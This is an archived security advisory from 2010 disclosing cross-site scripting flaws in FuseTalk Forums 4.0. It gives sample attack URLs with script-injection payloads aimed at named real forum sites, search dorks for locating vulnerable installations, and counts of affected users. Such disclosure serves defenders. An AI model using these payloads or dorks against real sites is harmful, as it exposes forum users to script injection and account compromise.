what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

FuseTalk Forums 4.0 Cross Site Scripting

FuseTalk Forums 4.0 Cross Site Scripting
Posted Aug 5, 2010
Authored by Martin Hall

FuseTalk Forums version 4.0 suffers from cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 5ee584db26751a109875b62fc70560e5650c91e0f64ad17531e082f02cd68801

FuseTalk Forums 4.0 Cross Site Scripting

Change Mirror Download
XSS vulnerability in FuseTalk Forums
-------------------------------------
Vulnerability ID: Month Of Full Disclosure 1 = MOFD1
------------------------------------
Product: FuseTalk
-------------------------------------
Vendor: FuseTalk Inc (
http://www.fusetalk.com/Company/AboutFuseTalk/tabid/111/Default.aspx )
-------------------------------------
Vulnerable Version: 4.0 Which is current version and Probably Prior Versions
-------------------------------------
Vendor Notification: 02 August 2010
Public Disclosure: 02 August 2010
-------------------------------------
Vulnerability Type: XSS (Cross Site Scripting)
-------------------------------------
Status: Public Disclosure - Not Fixed, Vendor Alerted,
Awaiting Vendor Response
-------------------------------------
Risk level: Medium
-------------------------------------
Credit: Martin Hall - TheTestManager
Site = http://www.thetestmanager.com
twitter = @thetestmanager
Vulnerability Details:
There exists multiple XSS errors in FuseTalk Forums.
These errors exist even months/years after previous HTML /SQL injection
errors were reported to FuseTalk.
It is time for a full and through source code review guys.
-------------------------------------
Potential Users Affected = minimum = 250,000 users
SunBelt = 5664 Users
FuseTalk = 11357
AMD = 103488 users
AMD Game = 43767
wilmott.com = 79718 users
collectors.com = 31396 users
2ndlight.com = 23033 users
-------------------------------------
Dork to find Vulnerable Sites (1)
fusetalk "users are registered"
Dork to find Vulnerable Sites (2)
© 1999-2010 FuseTalk Inc. All rights reserved.
-------------------------------------
Sample URL's
http://forums.fusetalk.com/usersearchresults.cfm?keyword=ttm--"%20><script>alert("TheTestManager.com-
Month of Full disclosure")</script>&FT_ACTION=SearchUsers - (IE8
tested)

or

http://supportforums.sunbeltsoftware.com/categories.aspx?catid=76&FTVAR_SORT=date&FTVAR_SORTORDER=0017ttm-"
style=x:expression(alert("TheTestManager")) ttm=" (IE7 test)
-------------------------------------
Solution:
Currently I'm not aware of any vendor-supplied patches or other solutions.
If you are aware of more recent information related to this issue
please notify me at: martin@hb-help.com

Users are recommended to use NoScript or other XSS mitigating software
Admins are advised to change forum software, or put pressure on
FuseTalk to carry out a full source code review.
-------------------------------------
Other Miscellany Information
http://www.fusetalk.com/ProductsServices/FuseTalk/WhosUsingFuseTalk/tabid/72/Default.aspx

Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close